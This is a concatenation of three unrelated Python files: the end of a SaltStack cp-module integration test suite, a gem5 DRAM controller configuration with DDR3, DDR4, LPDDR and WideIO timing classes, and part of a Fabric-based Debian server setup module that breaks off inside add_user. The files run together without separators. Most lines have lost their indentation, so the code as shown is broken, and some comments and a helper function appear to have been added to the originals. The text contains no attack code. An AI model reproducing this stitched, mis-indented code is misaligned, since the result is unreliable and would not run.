with salt.utils.fopen(tgt, 'r') as scene:
data = scene.read()
self.assertIn('KNIGHT: They\'re nervous, sire.', data)
self.assertNotIn('bacon', data)
def test_get_template(self):
'''
cp.get_template
'''
tgt = os.path.join(integration.TMP, 'scene33')
self.run_function(
'cp.get_template',
[
'salt://grail/scene33',
tgt,
'spam=bacon',
])
with salt.utils.fopen(tgt, 'r') as scene:
data = scene.read()
self.assertIn('bacon', data)
self.assertNotIn('spam', data)
def test_get_dir(self):
'''
cp.get_dir
'''
tgt = os.path.join(integration.TMP, 'many')
self.run_function(
'cp.get_dir',
[
'salt://grail',
tgt
])
self.assertIn('grail', os.listdir(tgt))
self.assertIn('36', os.listdir(os.path.join(tgt, 'grail')))
self.assertIn('empty', os.listdir(os.path.join(tgt, 'grail')))
self.assertIn('scene', os.listdir(os.path.join(tgt, 'grail', '36')))
def test_get_dir_templated_paths(self):
'''
cp.get_dir
'''
tgt = os.path.join(integration.TMP, 'many')
self.run_function(
'cp.get_dir',
[
'salt://{{grains.script}}',
tgt.replace('many', '{{grains.alot}}')
]
)
self.assertIn('grail', os.listdir(tgt))
self.assertIn('36', os.listdir(os.path.join(tgt, 'grail')))
self.assertIn('empty', os.listdir(os.path.join(tgt, 'grail')))
self.assertIn('scene', os.listdir(os.path.join(tgt, 'grail', '36')))
def test_get_url(self):
'''
cp.get_url with salt:// source
'''
tgt = os.path.join(integration.TMP, 'scene33')
self.run_function(
'cp.get_url',
[
'salt://grail/scene33',
tgt,
])
with salt.utils.fopen(tgt, 'r') as scene:
data = scene.read()
self.assertIn('KNIGHT: They\'re nervous, sire.', data)
self.assertNotIn('bacon', data)
def test_get_url_https(self):
'''
cp.get_url with https:// source
'''
tgt = os.path.join(integration.TMP, 'test_get_url_https')
self.run_function(
'cp.get_url',
[
'https://repo.saltstack.com/index.html',
tgt,
])
with salt.utils.fopen(tgt, 'r') as instructions:
data = instructions.read()
self.assertIn('Bootstrap', data)
self.assertIn('Debian', data)
self.assertIn('Windows', data)
self.assertNotIn('AYBABTU', data)
def test_cache_file(self):
'''
cp.cache_file
'''
ret = self.run_function(
'cp.cache_file',
[
'salt://grail/scene33',
])
with salt.utils.fopen(ret, 'r') as scene:
data = scene.read()
self.assertIn('KNIGHT: They\'re nervous, sire.', data)
self.assertNotIn('bacon', data)
def test_cache_files(self):
'''
cp.cache_files
'''
ret = self.run_function(
'cp.cache_files',
[
['salt://grail/scene33', 'salt://grail/36/scene'],
])
for path in ret:
with salt.utils.fopen(path, 'r') as scene:
data = scene.read()
self.assertIn('ARTHUR:', data)
self.assertNotIn('bacon', data)
def test_cache_master(self):
'''
cp.cache_master
'''
ret = self.run_function(
'cp.cache_master',
)
for path in ret:
self.assertTrue(os.path.exists(path))
def test_cache_local_file(self):
'''
cp.cache_local_file
'''
src = os.path.join(integration.TMP, 'random')
with salt.utils.fopen(src, 'w+') as fn_:
fn_.write('foo')
ret = self.run_function(
'cp.cache_local_file',
[src])
with salt.utils.fopen(ret, 'r') as cp_:
self.assertEqual(cp_.read(), 'foo')
def test_list_states(self):
'''
cp.list_states
'''
ret = self.run_function(
'cp.list_states',
)
self.assertIn('core', ret)
self.assertIn('top', ret)
def test_list_minion(self):
'''
cp.list_minion
'''
self.run_function(
'cp.cache_file',
[
'salt://grail/scene33',
])
ret = self.run_function('cp.list_minion')
found = False
for path in ret:
if 'grail/scene33' in path:
found = True
self.assertTrue(found)
def test_is_cached(self):
'''
cp.is_cached
'''
self.run_function(
'cp.cache_file',
[
'salt://grail/scene33',
])
ret1 = self.run_function(
'cp.is_cached',
[
'salt://grail/scene33',
])
self.assertTrue(ret1)
ret2 = self.run_function(
'cp.is_cached',
[
'salt://fasldkgj/poicxzbn',
])
self.assertFalse(ret2)
def test_hash_file(self):
'''
cp.hash_file
'''
md5_hash = self.run_function(
'cp.hash_file',
[
'salt://grail/scene33',
])
path = self.run_function(
'cp.cache_file',
[
'salt://grail/scene33',
])
with salt.utils.fopen(path, 'r') as fn_:
self.assertEqual(
md5_hash['hsum'],
hashlib.md5(fn_.read()).hexdigest()
)
def test_get_file_from_env_predefined(self):
'''
cp.get_file
'''
tgt = os.path.join(integration.TMP, 'cheese')
try:
self.run_function('cp.get_file', ['salt://cheese', tgt])
with salt.utils.fopen(tgt, 'r') as cheese:
data = cheese.read()
self.assertIn('Gromit', data)
self.assertNotIn('Comte', data)
finally:
os.unlink(tgt)
def test_get_file_from_env_in_url(self):
tgt = os.path.join(integration.TMP, 'cheese')
try:
self.run_function('cp.get_file', ['salt://cheese?saltenv=prod', tgt])
with salt.utils.fopen(tgt, 'r') as cheese:
data = cheese.read()
self.assertIn('Gromit', data)
self.assertIn('Comte', data)
finally:
os.unlink(tgt)
    def test_push(self):
        log_to_xfer = os.path.join(tempfile.gettempdir(), 'salt-runtests.log')
        # compute the target path before the try block so the finally clause
        # cannot hit a NameError if the push fails
        tgt_cache_file = os.path.join(
            integration.TMP,
            'master-minion-root',
            'cache',
            'minions',
            'minion',
            'files',
            tempfile.gettempdir(),
            'salt-runtests.log')
        try:
            self.run_function('cp.push', [log_to_xfer])
            self.assertTrue(os.path.isfile(tgt_cache_file), 'File was not cached on the master')
        finally:
            os.unlink(tgt_cache_file)
if __name__ == '__main__':
from integration import run_tests
run_tests(CPModuleTest)
# Copyright (c) 2012-2014 ARM Limited
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Copyright (c) 2013 Amin Farmahini-Farahani
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Andreas Hansson
# Ani Udipi
from m5.params import *
from AbstractMemory import *
# Enum for memory scheduling algorithms, currently First-Come
# First-Served and a First-Row Hit then First-Come First-Served
class MemSched(Enum): vals = ['fcfs', 'frfcfs']
# Enum for the address mapping. With Ch, Ra, Ba, Ro and Co denoting
# channel, rank, bank, row and column, respectively, and going from
# MSB to LSB. Available are RoRaBaChCo and RoRaBaCoCh, that are
# suitable for an open-page policy, optimising for sequential accesses
# hitting in the open row. For a closed-page policy, RoCoRaBaCh
# maximises parallelism.
class AddrMap(Enum): vals = ['RoRaBaChCo', 'RoRaBaCoCh', 'RoCoRaBaCh']
# Enum for the page policy, either open, open_adaptive, close, or
# close_adaptive.
class PageManage(Enum): vals = ['open', 'open_adaptive', 'close',
'close_adaptive']
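# A minimal sketch (assumption: run from a separate gem5 configuration script,
# not from this file) of overriding these enum-valued parameters on a
# controller instance:
#
#   ctrl = DDR3_1600_x64()
#   ctrl.mem_sched_policy = 'fcfs'
#   ctrl.addr_mapping = 'RoCoRaBaCh'     # the closed-page friendly mapping
#   ctrl.page_policy = 'close_adaptive'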
# DRAMCtrl is a single-channel single-ported DRAM controller model
# that aims to model the most important system-level performance
# effects of a DRAM without getting into too much detail of the DRAM
# itself.
class DRAMCtrl(AbstractMemory):
type = 'DRAMCtrl'
cxx_header = "mem/dram_ctrl.hh"
# single-ported on the system interface side, instantiate with a
# bus in front of the controller for multiple ports
port = SlavePort("Slave port")
# the basic configuration of the controller architecture
write_buffer_size = Param.Unsigned(64, "Number of write queue entries")
read_buffer_size = Param.Unsigned(32, "Number of read queue entries")
# threshold in percent for when to forcefully trigger writes and
# start emptying the write buffer
write_high_thresh_perc = Param.Percent(85, "Threshold to force writes")
# threshold in percentage for when to start writes if the read
# queue is empty
write_low_thresh_perc = Param.Percent(50, "Threshold to start writes")
# minimum write bursts to schedule before switching back to reads
min_writes_per_switch = Param.Unsigned(16, "Minimum write bursts before "
"switching to reads")
# scheduler, address map and page policy
mem_sched_policy = Param.MemSched('frfcfs', "Memory scheduling policy")
addr_mapping = Param.AddrMap('RoRaBaChCo', "Address mapping policy")
page_policy = Param.PageManage('open_adaptive', "Page management policy")
# enforce a limit on the number of accesses per row
    max_accesses_per_row = Param.Unsigned(16, "Max accesses per row before "
                                          "closing")
# pipeline latency of the controller and PHY, split into a
# frontend part and a backend part, with reads and writes serviced
# by the queues only seeing the frontend contribution, and reads
# serviced by the memory seeing the sum of the two
static_frontend_latency = Param.Latency("10ns", "Static frontend latency")
static_backend_latency = Param.Latency("10ns", "Static backend latency")
# the physical organisation of the DRAM
device_bus_width = Param.Unsigned("data bus width in bits for each DRAM "\
"device/chip")
    burst_length = Param.Unsigned("Burst length (BL) in beats")
device_rowbuffer_size = Param.MemorySize("Page (row buffer) size per "\
"device/chip")
devices_per_rank = Param.Unsigned("Number of devices/chips per rank")
ranks_per_channel = Param.Unsigned("Number of ranks per channel")
# default to 0 bank groups per rank, indicating bank group architecture
# is not used
# update per memory class when bank group architecture is supported
bank_groups_per_rank = Param.Unsigned(0, "Number of bank groups per rank")
banks_per_rank = Param.Unsigned("Number of banks per rank")
# only used for the address mapping as the controller by
# construction is a single channel and multiple controllers have
# to be instantiated for a multi-channel configuration
channels = Param.Unsigned(1, "Number of channels")
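    # Sketch (assumption: done in a top-level configuration script, not here):
    # a dual-channel memory system is therefore modelled as two controllers,
    # e.g.
    #
    #   system.mem_ctrls = [DDR3_1600_x64() for _ in range(2)]
    #
    # with the address range interleaved between them by that script.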
# timing behaviour and constraints - all in nanoseconds
# the base clock period of the DRAM
tCK = Param.Latency("Clock period")
# the amount of time in nanoseconds from issuing an activate command
# to the data being available in the row buffer for a read/write
tRCD = Param.Latency("RAS to CAS delay")
# the time from issuing a read/write command to seeing the actual data
tCL = Param.Latency("CAS latency")
# minimum time between a precharge and subsequent activate
tRP = Param.Latency("Row precharge time")
# minimum time between an activate and a precharge to the same row
tRAS = Param.Latency("ACT to PRE delay")
# minimum time between a write data transfer and a precharge
tWR = Param.Latency("Write recovery time")
# minimum time between a read and precharge command
tRTP = Param.Latency("Read to precharge")
# time to complete a burst transfer, typically the burst length
# divided by two due to the DDR bus, but by making it a parameter
# it is easier to also evaluate SDR memories like WideIO.
# This parameter has to account for burst length.
# Read/Write requests with data size larger than one full burst are broken
# down into multiple requests in the controller
# tBURST is equivalent to the CAS-to-CAS delay (tCCD)
# With bank group architectures, tBURST represents the CAS-to-CAS
# delay for bursts to different bank groups (tCCD_S)
tBURST = Param.Latency("Burst duration (for DDR burst length / 2 cycles)")
# CAS-to-CAS delay for bursts to the same bank group
# only utilized with bank group architectures; set to 0 for default case
# tBURST is equivalent to tCCD_S; no explicit parameter required
# for CAS-to-CAS delay for bursts to different bank groups
tCCD_L = Param.Latency("0ns", "Same bank group CAS to CAS delay")
# time taken to complete one refresh cycle (N rows in all banks)
tRFC = Param.Latency("Refresh cycle time")
# refresh command interval, how often a "ref" command needs
# to be sent. It is 7.8 us for a 64ms refresh requirement
tREFI = Param.Latency("Refresh command interval")
# write-to-read, same rank turnaround penalty
tWTR = Param.Latency("Write to read, same rank switching time")
# read-to-write, same rank turnaround penalty
tRTW = Param.Latency("Read to write, same rank switching time")
# rank-to-rank bus delay penalty
# this does not correlate to a memory timing parameter and encompasses:
# 1) RD-to-RD, 2) WR-to-WR, 3) RD-to-WR, and 4) WR-to-RD
# different rank bus delay
tCS = Param.Latency("Rank to rank switching time")
# minimum row activate to row activate delay time
tRRD = Param.Latency("ACT to ACT delay")
# only utilized with bank group architectures; set to 0 for default case
tRRD_L = Param.Latency("0ns", "Same bank group ACT to ACT delay")
# time window in which a maximum number of activates are allowed
# to take place, set to 0 to disable
tXAW = Param.Latency("X activation window")
activation_limit = Param.Unsigned("Max number of activates in window")
# Currently rolled into other params
######################################################################
# tRC - assumed to be tRAS + tRP
# A single DDR3-1600 x64 channel (one command and address bus), with
# timings based on a DDR3-1600 4 Gbit datasheet (Micron MT41J512M8) in
# an 8x8 configuration, amounting to 4 Gbyte of memory.
class DDR3_1600_x64(DRAMCtrl):
# 8x8 configuration, 8 devices each with an 8-bit interface
device_bus_width = 8
# DDR3 is a BL8 device
burst_length = 8
# Each device has a page (row buffer) size of 1 Kbyte (1K columns x8)
device_rowbuffer_size = '1kB'
# 8x8 configuration, so 8 devices
devices_per_rank = 8
# Use two ranks
ranks_per_channel = 2
# DDR3 has 8 banks in all configurations
banks_per_rank = 8
# 800 MHz
tCK = '1.25ns'
# 8 beats across an x64 interface translates to 4 clocks @ 800 MHz
tBURST = '5ns'
# DDR3-1600 11-11-11
tRCD = '13.75ns'
tCL = '13.75ns'
tRP = '13.75ns'
tRAS = '35ns'
tRRD = '6ns'
tXAW = '30ns'
activation_limit = 4
tRFC = '260ns'
tWR = '15ns'
# Greater of 4 CK or 7.5 ns
tWTR = '7.5ns'
# Greater of 4 CK or 7.5 ns
tRTP = '7.5ns'
# Default same rank rd-to-wr bus turnaround to 2 CK, @800 MHz = 2.5 ns
tRTW = '2.5ns'
# Default different rank bus delay to 2 CK, @800 MHz = 2.5 ns
tCS = '2.5ns'
# <=85C, half for >85C
tREFI = '7.8us'
# A single DDR3-2133 x64 channel refining a selected subset of the
# options for the DDR-1600 configuration, based on the same DDR3-1600
# 4 Gbit datasheet (Micron MT41J512M8). Most parameters are kept
# consistent across the two configurations.
class DDR3_2133_x64(DDR3_1600_x64):
# 1066 MHz
tCK = '0.938ns'
# 8 beats across an x64 interface translates to 4 clocks @ 1066 MHz
tBURST = '3.752ns'
# DDR3-2133 14-14-14
tRCD = '13.09ns'
tCL = '13.09ns'
tRP = '13.09ns'
tRAS = '33ns'
tRRD = '5ns'
tXAW = '25ns'
# A single DDR4-2400 x64 channel (one command and address bus), with
# timings based on a DDR4-2400 4 Gbit datasheet (Samsung K4A4G085WD)
# in an 8x8 configuration, amounting to 4 Gbyte of memory.
class DDR4_2400_x64(DRAMCtrl):
# 8x8 configuration, 8 devices each with an 8-bit interface
device_bus_width = 8
# DDR4 is a BL8 device
burst_length = 8
# Each device has a page (row buffer) size of 1 Kbyte (1K columns x8)
device_rowbuffer_size = '1kB'
# 8x8 configuration, so 8 devices
devices_per_rank = 8
# Use a single rank
ranks_per_channel = 1
# DDR4 has 2 (x16) or 4 (x4 and x8) bank groups
# Set to 4 for x4, x8 case
bank_groups_per_rank = 4
# DDR4 has 16 banks (4 bank groups) in all
# configurations. Currently we do not capture the additional
# constraints incurred by the bank groups
banks_per_rank = 16
# 1200 MHz
tCK = '0.833ns'
# 8 beats across an x64 interface translates to 4 clocks @ 1200 MHz
# tBURST is equivalent to the CAS-to-CAS delay (tCCD)
# With bank group architectures, tBURST represents the CAS-to-CAS
# delay for bursts to different bank groups (tCCD_S)
tBURST = '3.333ns'
# @2400 data rate, tCCD_L is 6 CK
# CAS-to-CAS delay for bursts to the same bank group
# tBURST is equivalent to tCCD_S; no explicit parameter required
# for CAS-to-CAS delay for bursts to different bank groups
    tCCD_L = '5ns'
# DDR4-2400 17-17-17
tRCD = '14.16ns'
tCL = '14.16ns'
tRP = '14.16ns'
tRAS = '32ns'
# RRD_S (different bank group) for 1K page is MAX(4 CK, 3.3ns)
tRRD = '3.3ns'
# RRD_L (same bank group) for 1K page is MAX(4 CK, 4.9ns)
    tRRD_L = '4.9ns'
tXAW = '21ns'
activation_limit = 4
tRFC = '260ns'
tWR = '15ns'
# Here using the average of WTR_S and WTR_L
tWTR = '5ns'
# Greater of 4 CK or 7.5 ns
tRTP = '7.5ns'
# Default same rank rd-to-wr bus turnaround to 2 CK, @1200 MHz = 1.666 ns
tRTW = '1.666ns'
# Default different rank bus delay to 2 CK, @1200 MHz = 1.666 ns
tCS = '1.666ns'
# <=85C, half for >85C
tREFI = '7.8us'
# A single DDR3 x64 interface (one command and address bus), with
# default timings based on DDR3-1333 4 Gbit parts in an 8x8
# configuration, which would amount to 4 GByte of memory. This
# configuration is primarily for comparing with DRAMSim2, and all the
# parameters except ranks_per_channel are based on the DRAMSim2 config
# file DDR3_micron_32M_8B_x8_sg15.ini. Note that ranks_per_channel has
# to be manually set, depending on size of the memory to be
# simulated. By default DRAMSim2 has 2048MB of memory with a single
# rank. Therefore for 4 GByte memory, set ranks_per_channel = 2
class DDR3_1333_x64_DRAMSim2(DRAMCtrl):
# 8x8 configuration, 8 devices each with an 8-bit interface
device_bus_width = 8
# DDR3 is a BL8 device
burst_length = 8
# Each device has a page (row buffer) size of 1KB
# (this depends on the memory density)
device_rowbuffer_size = '1kB'
# 8x8 configuration, so 8 devices
devices_per_rank = 8
# Use two ranks
ranks_per_channel = 2
# DDR3 has 8 banks in all configurations
banks_per_rank = 8
    # 666.66 MHz
tCK = '1.5ns'
tRCD = '15ns'
tCL = '15ns'
tRP = '15ns'
tRAS = '36ns'
tWR = '15ns'
tRTP = '7.5ns'
# 8 beats across an x64 interface translates to 4 clocks @ 666.66 MHz.
# Note this is a BL8 DDR device.
tBURST = '6ns'
tRFC = '160ns'
# DDR3, <=85C, half for >85C
tREFI = '7.8us'
# Greater of 4 CK or 7.5 ns, 4 CK @ 666.66 MHz = 6 ns
tWTR = '7.5ns'
# Default same rank rd-to-wr bus turnaround to 2 CK, @666.66 MHz = 3 ns
tRTW = '3ns'
# Default different rank bus delay to 2 CK, @666.66 MHz = 3 ns
tCS = '3ns'
tRRD = '6.0ns'
tXAW = '30ns'
activation_limit = 4
# A single LPDDR2-S4 x32 interface (one command/address bus), with
# default timings based on a LPDDR2-1066 4 Gbit part in a 1x32
# configuration.
class LPDDR2_S4_1066_x32(DRAMCtrl):
# 1x32 configuration, 1 device with a 32-bit interface
device_bus_width = 32
# LPDDR2_S4 is a BL4 and BL8 device
burst_length = 8
# Each device has a page (row buffer) size of 1KB
# (this depends on the memory density)
device_rowbuffer_size = '1kB'
# 1x32 configuration, so 1 device
devices_per_rank = 1
# Use a single rank
ranks_per_channel = 1
# LPDDR2-S4 has 8 banks in all configurations
banks_per_rank = 8
# 533 MHz
tCK = '1.876ns'
# Fixed at 15 ns
tRCD = '15ns'
# 8 CK read latency, 4 CK write latency @ 533 MHz, 1.876 ns cycle time
tCL = '15ns'
# Pre-charge one bank 15 ns (all banks 18 ns)
tRP = '15ns'
tRAS = '42ns'
tWR = '15ns'
# 6 CK read to precharge delay
tRTP = '11.256ns'
# 8 beats across an x32 DDR interface translates to 4 clocks @ 533 MHz.
# Note this is a BL8 DDR device.
# Requests larger than 32 bytes are broken down into multiple requests
# in the controller
tBURST = '7.5ns'
# LPDDR2-S4, 4 Gbit
tRFC = '130ns'
tREFI = '3.9us'
# Irrespective of speed grade, tWTR is 7.5 ns
tWTR = '7.5ns'
# Default same rank rd-to-wr bus turnaround to 2 CK, @533 MHz = 3.75 ns
tRTW = '3.75ns'
# Default different rank bus delay to 2 CK, @533 MHz = 3.75 ns
tCS = '3.75ns'
# Activate to activate irrespective of density and speed grade
tRRD = '10.0ns'
# Irrespective of density, tFAW is 50 ns
tXAW = '50ns'
activation_limit = 4
# A single WideIO x128 interface (one command and address bus), with
# default timings based on an estimated WIO-200 8 Gbit part.
class WideIO_200_x128(DRAMCtrl):
# 1x128 configuration, 1 device with a 128-bit interface
device_bus_width = 128
# This is a BL4 device
burst_length = 4
# Each device has a page (row buffer) size of 4KB
# (this depends on the memory density)
device_rowbuffer_size = '4kB'
# 1x128 configuration, so 1 device
devices_per_rank = 1
# Use one rank for a one-high die stack
ranks_per_channel = 1
# WideIO has 4 banks in all configurations
banks_per_rank = 4
# 200 MHz
tCK = '5ns'
# WIO-200
tRCD = '18ns'
tCL = '18ns'
tRP = '18ns'
tRAS = '42ns'
tWR = '15ns'
# Read to precharge is same as the burst
tRTP = '20ns'
# 4 beats across an x128 SDR interface translates to 4 clocks @ 200 MHz.
# Note this is a BL4 SDR device.
tBURST = '20ns'
# WIO 8 Gb
tRFC = '210ns'
# WIO 8 Gb, <=85C, half for >85C
tREFI = '3.9us'
# Greater of 2 CK or 15 ns, 2 CK @ 200 MHz = 10 ns
tWTR = '15ns'
# Default same rank rd-to-wr bus turnaround to 2 CK, @200 MHz = 10 ns
tRTW = '10ns'
# Default different rank bus delay to 2 CK, @200 MHz = 10 ns
tCS = '10ns'
# Activate to activate irrespective of density and speed grade
tRRD = '10.0ns'
    # Two activates (instead of four) allowed in the activation window
tXAW = '50ns'
activation_limit = 2
# A single LPDDR3 x32 interface (one command/address bus), with
# default timings based on a LPDDR3-1600 4 Gbit part in a 1x32
# configuration
class LPDDR3_1600_x32(DRAMCtrl):
# 1x32 configuration, 1 device with a 32-bit interface
device_bus_width = 32
# LPDDR3 is a BL8 device
burst_length = 8
# Each device has a page (row buffer) size of 4KB
device_rowbuffer_size = '4kB'
# 1x32 configuration, so 1 device
devices_per_rank = 1
# Use a single rank
ranks_per_channel = 1
# LPDDR3 has 8 banks in all configurations
banks_per_rank = 8
# 800 MHz
tCK = '1.25ns'
# Fixed at 15 ns
tRCD = '15ns'
# 12 CK read latency, 6 CK write latency @ 800 MHz, 1.25 ns cycle time
tCL = '15ns'
tRAS = '42ns'
tWR = '15ns'
# Greater of 4 CK or 7.5 ns, 4 CK @ 800 MHz = 5 ns
tRTP = '7.5ns'
# Pre-charge one bank 15 ns (all banks 18 ns)
tRP = '15ns'
# 8 beats across a x32 DDR interface translates to 4 clocks @ 800 MHz.
# Note this is a BL8 DDR device.
# Requests larger than 32 bytes are broken down into multiple requests
# in the controller
tBURST = '5ns'
# LPDDR3, 4 Gb
tRFC = '130ns'
tREFI = '3.9us'
# Irrespective of speed grade, tWTR is 7.5 ns
tWTR = '7.5ns'
# Default same rank rd-to-wr bus turnaround to 2 CK, @800 MHz = 2.5 ns
tRTW = '2.5ns'
# Default different rank bus delay to 2 CK, @800 MHz = 2.5 ns
tCS = '2.5ns'
# Activate to activate irrespective of density and speed grade
tRRD = '10.0ns'
# Irrespective of size, tFAW is 50 ns
tXAW = '50ns'
activation_limit = 4
import re
import socket
import time
from fabric.context_managers import settings
from fabric.decorators import task
from fabric.network import disconnect_all
from fabric.state import env
from fabric.contrib.console import confirm
from fabric.contrib.files import exists, comment, append, uncomment
from fabric.operations import sudo, prompt, put, os, reboot
from fabric.utils import abort
from fabdeb.tools import print_green, print_yellow, print_red
__all__ = ('check_os', 'check_sudo', 'setup_swap', 'configure_hostname', 'configure_timezone', 'add_user',
'install_user_rsa_key', 'service_restart', 'server_reboot', 'update_locale')
SUPPORT_OS = (
# os issue, major versions, os name
('Debian GNU/Linux', ('8', '9'), 'Debian'),
)
OS_REPOSITORIES = {
'Debian': {
'8': (
'deb http://http.debian.net/debian jessie main contrib non-free\n'
'deb-src http://http.debian.net/debian jessie main contrib non-free\n'
'\n'
'deb http://http.debian.net/debian jessie-updates main contrib non-free\n'
'deb-src http://http.debian.net/debian jessie-updates main contrib non-free\n'
'\n'
'deb http://security.debian.org/ jessie/updates main contrib non-free\n'
'deb-src http://security.debian.org/ jessie/updates main contrib non-free\n'
),
'9': (
'deb http://deb.debian.org/debian stretch main contrib non-free\n'
'deb-src http://deb.debian.org/debian stretch main contrib non-free\n'
'\n'
'deb http://deb.debian.org/debian stretch-updates main contrib non-free\n'
'deb-src http://deb.debian.org/debian stretch-updates main contrib non-free\n'
'\n'
'deb http://security.debian.org/ stretch/updates main contrib non-free\n'
'deb-src http://security.debian.org/ stretch/updates main contrib non-free\n'
),
},
}
OS_REPOS_INSTALL_KEYS_COMMANDS = {}
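# Hypothetical helper (a sketch, not part of fabdeb's public API): one way the
# OS_REPOSITORIES table above could be applied to a host, assuming that
# overwriting /etc/apt/sources.list is acceptable. check_os() is defined below.
def _write_sources_list():
    os_name, os_ver = check_os()
    repos = OS_REPOSITORIES[os_name][os_ver]
    # keep a backup of the current list, then replace it wholesale
    sudo('cp /etc/apt/sources.list /etc/apt/sources.list.bak', warn_only=True)
    sudo("echo '{}' > /etc/apt/sources.list".format(repos))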
def user_exists(username):
return exists('/home/{}'.format(username), use_sudo=True)
# # # COMMANDS # # #
@task
def check_os():
"""
Check OS supported by fabdeb
"""
if '_fd_checked_os_' in env:
return env._fd_checked_os_
print_green('INFO: Check your OS...')
remote_os_issue = sudo('cat /etc/issue', quiet=True)
if remote_os_issue.failed:
remote_os_issue = ''
remote_os_issue = remote_os_issue.replace('\\n', '').replace('\\l', '').strip()
remote_os_name = allow_versions = ok = None
if remote_os_issue:
for os_issue, versions, os_name in SUPPORT_OS:
if os_issue in remote_os_issue:
remote_os_name = os_name
allow_versions = versions
ok = True
break
if not ok:
abort('Your OS "{}" is not supported :('.format(remote_os_issue))
remote_os_ver = sudo('cat /etc/debian_version', quiet=True)
if remote_os_ver.failed:
remote_os_ver = ''
remote_os_ver = remote_os_ver.split('.', 1)[0].strip()
if remote_os_ver not in allow_versions:
abort('Your OS "{}" version "{}" is not supported :('.format(remote_os_issue, remote_os_ver))
print_green('INFO: Check your OS... OK')
env._fd_checked_os_ = remote_os_name, remote_os_ver
return env._fd_checked_os_
@task
def check_sudo():
"""
Check available sudo command
"""
if '_fd_checked_sudo_' in env:
return
print_green('INFO: Check sudo...')
t = sudo('whoami', quiet=True)
if t.failed:
print_red('NOTE: For using this fabfile you need to install sudo:\n'
' # aptitude install sudo\n'
'and add your non-root user to group sudo:\n'
' # adduser YourNonRootUserName sudo')
abort(t)
print_green('INFO: Check sudo... OK')
env._fd_checked_sudo_ = True
@task
def setup_swap():
"""
Setup SWAP and configure swappiness
"""
check_sudo()
check_os()
print_green('INFO: Setup SWAP...')
t = sudo('swapon -s', quiet=True)
if not re.search(r'\s\d+\s', t):
swap_size = int(prompt("Server doesn't have SWAP. Set size in MB to create SWAP. Keep 0 to skip.",
default='0', validate=r'\d+'))
if swap_size:
swap_fn = '/swapfile'
sudo('fallocate -l {size}M {sfn}'.format(size=swap_size, sfn=swap_fn))
command_defrag = 'e4defrag {sfn}'.format(sfn=swap_fn)
print_green('Defragmenting swap file: {}...'.format(command_defrag))
sudo(command_defrag, quiet=True)
sudo('chown root:root {sfn} && chmod 600 {sfn}'.format(sfn=swap_fn))
sudo('mkswap {sfn}'.format(sfn=swap_fn))
sudo('swapon {sfn}'.format(sfn=swap_fn))
append('/etc/fstab', '{sfn} swap swap defaults 0 0'.format(sfn=swap_fn), use_sudo=True)
swappiness_size = int(prompt("Set vm.swappiness parameter to /etc/sysctl.conf",
default='10', validate=r'\d+'))
append('/etc/sysctl.conf', 'vm.swappiness={}'.format(swappiness_size), use_sudo=True)
sudo('sysctl -p')
print_green('INFO: Setup SWAP... OK')
@task
def configure_hostname():
"""
Configure hostname, host ip, /etc/hosts
"""
check_sudo()
check_os()
print_green('INFO: Configure hostname...')
chn = sudo('cat /etc/hostname').strip()
nhn = prompt('Set hostname', default=chn, validate=r'[\w\.\-]+')
ip = prompt('Set host ip', default=socket.gethostbyname(env.host),
validate=r'^((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$')
sudo('echo "{}" > /etc/hostname'.format(nhn))
comment('/etc/hosts', r'127.0.0.1', use_sudo=True)
comment('/etc/hosts', r'127.0.1.1', use_sudo=True, backup='')
append('/etc/hosts', '\n127.0.0.1\tlocalhost', use_sudo=True)
append('/etc/hosts', '127.0.1.1\t{}'.format(nhn.split('.')[0]), use_sudo=True)
append('/etc/hosts', '{}\t{}'.format(ip, nhn), use_sudo=True)
sudo('hostname -F /etc/hostname')
print_green('INFO: Configure hostname... OK')
@task
def configure_timezone():
"""
Configure timezone
"""
check_sudo()
check_os()
print_green('INFO: Configure timezone...')
current_tz = sudo('cat /etc/timezone', quiet=True).strip()
def validate_tz(tz):
tz = tz.strip()
fn = '/usr/share/zoneinfo/{}'.format(tz)
if ('.' not in tz and exists(fn, use_sudo=True) and
sudo('head -c 4 {}'.format(fn), quiet=True) == 'TZif'):
return tz
raise ValueError('Invalid timezone. See http://twiki.org/cgi-bin/xtra/tzdatepick.html')
new_timezone = prompt('Set timezone', default=current_tz, validate=validate_tz)
if current_tz != new_timezone:
sudo('timedatectl set-timezone {}'.format(new_timezone))
print_green('INFO: Configure timezone... OK')
@task
def add_user(username, py_ver='2', skip_confirm=False):
"""
Add new system user
"""
assert py_ver in ('2', '3')
check_sudo()
check_os()
if user_exists(username):
abort('User {} exists'.format(username))
if not skip_confirm:
if not confirm('Do you want to create new user?'):
return
print_green('INFO: Add system user "{}"...'.format(username))
sudo('adduser {}'.format(username))
